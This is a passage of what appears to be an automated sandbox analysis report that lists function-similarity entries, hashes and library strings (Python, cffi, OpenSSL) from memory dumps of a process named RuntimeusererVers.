                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52512865A08E4386E760CB25E848A7963A1FB84FF4F544631DD5E47BA4DE3CF8A5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566347608.00007FF81DC71000.00000020.00000001.01000000.0000004D.sdmp, Offset: 00007FF81DC70000, based on PE: true
• Associated: 00000030.00000002.1566298623.00007FF81DC70000.00000002.00000001.01000000.0000004D.sdmp
• Associated: 00000030.00000002.1566383557.00007FF81DC73000.00000002.00000001.01000000.0000004D.sdmp
• Associated: 00000030.00000002.1566435114.00007FF81DC75000.00000004.00000001.01000000.0000004D.sdmp
• Associated: 00000030.00000002.1566474761.00007FF81DC76000.00000002.00000001.01000000.0000004D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Eval_ThreadThread_acquire_lock_timedTime_$CallsDeadline_FromMakeMicrosecondsModuleNoneObjectPendingRestoreSaveSecondsStringThread_release_lockType_
                                                                                                                                                                                                                                          • String ID: 'timeout' must be a non-negative number$timeout value is too large
                                                                                                                                                                                                                                          • API String ID: 1143863106-4256478105
                                                                                                                                                                                                                                          • Opcode ID: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
                                                                                                                                                                                                                                          • Instruction ID: ec9926ca36808e5b50160abb8129adefff7e6d17b7e5828bce15f13e680f48b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ec1b1fa42c07ad777bce140c811d275ad25926547c9346e609a1a1f99469cc7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31511526A08E5692EB119B11D9953396361FB88BF0F404B31CE5FCBB94EF3CE4568741
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
• Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_$Module_$FromItemObject$DeallocStringUnicode_$BuildLongLong_SizeStateValue_
                                                                                                                                                                                                                                          • String ID: err_codes_to_names$err_names_to_codes$lib_codes_to_names
                                                                                                                                                                                                                                          • API String ID: 3638348250-3898622116
                                                                                                                                                                                                                                          • Opcode ID: 9c40e612007d979e86af836558dfbe017010d0c2d7bd102fcad4e2c260463dcc
                                                                                                                                                                                                                                          • Instruction ID: 13f153711bbb16721b81d67b415ce8454335fd276d647809b192187970124e30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c40e612007d979e86af836558dfbe017010d0c2d7bd102fcad4e2c260463dcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B410025A0AF4781FB158F25A80826873E0BF49BF6F884234DA4D57B94EF3CF5918340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Dealloc$FetchRestoreUnicode_$ArgsCallClearFormatFromFunctionObject_UnraisableWrite
                                                                                                                                                                                                                                          • String ID: %c%s%R%s$%c%s%s$rom callback for ffi.gc
                                                                                                                                                                                                                                          • API String ID: 2923111776-761869168
                                                                                                                                                                                                                                          • Opcode ID: 02cc20475e2eb133c95a1aae833ee4b95de07a25b4740ac56dfd03478cfc7d87
                                                                                                                                                                                                                                          • Instruction ID: 72273d5a6fcd543926080be75349bd0e1f18257ab115bb00e16f61c2bcc63cc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02cc20475e2eb133c95a1aae833ee4b95de07a25b4740ac56dfd03478cfc7d87
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6410A36A09E42C2EA689B51EC642FD63A1FB85BE4F044231DA8E07B24DF7DF5498740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
• Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DigestX_mdX_new$D_sizeD_typeFinal_exO_ctrlO_freeUpdateX_copy_exX_ctrlX_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_enc.c
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BufferBuffer_Err_Eval_Object_ReleaseStringThreadUpdate$CheckRestoreSaveThread_acquire_lockThread_allocate_lockThread_release_lock
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$object supporting the buffer API required
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$DeallocOccurred$FormatObject_$ComplexComplex_DoubleFloat_Instance
                                                                                                                                                                                                                                          • String ID: cannot cast %.200s object to ctype '%s'$cannot cast ctype '%s' to ctype '%s'$cannot cast to ctype '%s'
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Long_String$LongObject_Sign$DeallocErrorFatalFormatFuncInitMallocMaskOccurredUnsigned
                                                                                                                                                                                                                                          • String ID: an integer is required$cannot cast %s to ctype '%s'$integer conversion failed$unicode string of length %zd$write_raw_integer_data$write_raw_integer_data: bad integer size
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocModule_$Dict_String$AttrDictFromItemObjectObject_Proxy_StateUnicode_strncmp
                                                                                                                                                                                                                                          • String ID: _constructors$openssl_
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$Eval_Thread$Bytes_D_sizeDeallocFromLongLong_Module_OccurredPy_hashtable_getRestoreSaveSizeState
                                                                                                                                                                                                                                          • String ID: iteration value must be greater than 0.$key length must be greater than 0.$password is too long.$salt is too long.
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • from_buffer('%s', ..): the actual length of the array cannot be computed, xrefs: 00007FF81E50D4DF
                                                                                                                                                                                                                                          • buffer is too small (%zd bytes) for '%s' (%zd bytes), xrefs: 00007FF81E50D47C
                                                                                                                                                                                                                                          • expected a pointer or array ctype, got '%s', xrefs: 00007FF81E50D3A1
                                                                                                                                                                                                                                          • from_buffer() cannot return the address of a unicode object, xrefs: 00007FF81E50D3CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: buffer is too small (%zd bytes) for '%s' (%zd bytes)$expected a pointer or array ctype, got '%s'$from_buffer('%s', ..): the actual length of the array cannot be computed$from_buffer() cannot return the address of a unicode object
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatLong_OccurredSsize_t$String
                                                                                                                                                                                                                                          • String ID: cdata of type '%s' cannot be indexed$index too large (expected %zd <= %zd)$negative index$slice start > stop$slice start must be specified$slice stop must be specified$slice with step not supported
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Err_FormatItem$DeallocUnicode_
                                                                                                                                                                                                                                          • String ID: or $cdata object$ctype object$expected a %s%s%s%s%s, got '%.200s'$string$the type '%s%s' is a function type, not a pointer-to-function type$unexpected symbol
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$AttrObject_StringTuple_$Err_FormatImportImport_ModuleSubtypeType_
                                                                                                                                                                                                                                          • String ID: ffi$lib$while loading %.200s: failed to import ffi, lib from %.200s
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$Arg_$ArgumentBufferContiguousObject_Release$KeywordsUnpack
                                                                                                                                                                                                                                          • String ID: argument 'key'$argument 'msg'$contiguous buffer$hmac_digest
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_free$E_dupL_sk_findL_sk_pushL_sk_set_cmp_funcM_read_bio_O_freeR_clear_errorR_put_errorX509X509_freeX509_get_subject_name
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_cert.c
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Bytes_DeallocErr_M_read_bio_Module_O_ctrlO_freeO_newO_s_fileStateX509X509_free
                                                                                                                                                                                                                                          • String ID: Can't malloc memory to read file$Can't open file$Error decoding PEM-encoded file
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Format$R_clear_errorR_func_error_stringR_lib_error_stringR_peek_last_errorR_reason_error_stringString
                                                                                                                                                                                                                                          • String ID: [%s: %s] %s$[%s] %s$no reason supplied
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: [%llu]$array item of unknown size: '%s'$array size would overflow a Py_ssize_t$first arg must be a pointer ctype
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongLong_
                                                                                                                                                                                                                                          • String ID: int() not supported on cdata '%s'$read_raw_float_data$read_raw_float_data: bad float size$read_raw_signed_data$read_raw_signed_data: bad integer size
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Callable_CheckDeallocSize$BuildBytes_Err_FormatFromStringValue_memset
                                                                                                                                                                                                                                          • String ID: OOOO$expected a callable object for 'onerror', not %.200s$expected a callable object, not %.200s$expected a function ctype, got '%s'
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$CertEnhancedErrorFromLastMallocMem_MemoryUsageWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2062549779-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$Bytes_D_sizeDigestErr_FinalFromMemoryRestoreSaveSizeStringThread_release_lockX_copyX_freeX_mdX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2079540947-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$D_sizeDigestErr_FinalMemoryPy_strhexRestoreSaveThread_release_lockX_copyX_freeX_mdX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2842303453-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_$Free$X_free$Err_Memory$DigestFinalMallocPy_strhexX_copyX_new
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 422439089-0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$Unicode_memcpy
                                                                                                                                                                                                                                          • String ID: bytes or list or tuple$initializer bytes is too long for '%s' (got %zd characters)$initializer unicode is too long for '%s' (got %zd characters)$list or tuple$too many initializers for '%s' (got %zd)$unicode character out of range for conversion to char16_t: 0x%x$unicode or list or tuple
                                                                                                                                                                                                                                          • API String ID: 3046177526-3363920172
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EVP_PKEY_CTX_new.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E0575
                                                                                                                                                                                                                                          • X509_get0_pubkey.LIBCRYPTO-1_1(?,?,?,?,?,..\s\ssl\statem\statem_srvr.c,00007FF81E0E2510), ref: 00007FF81E0E05E6
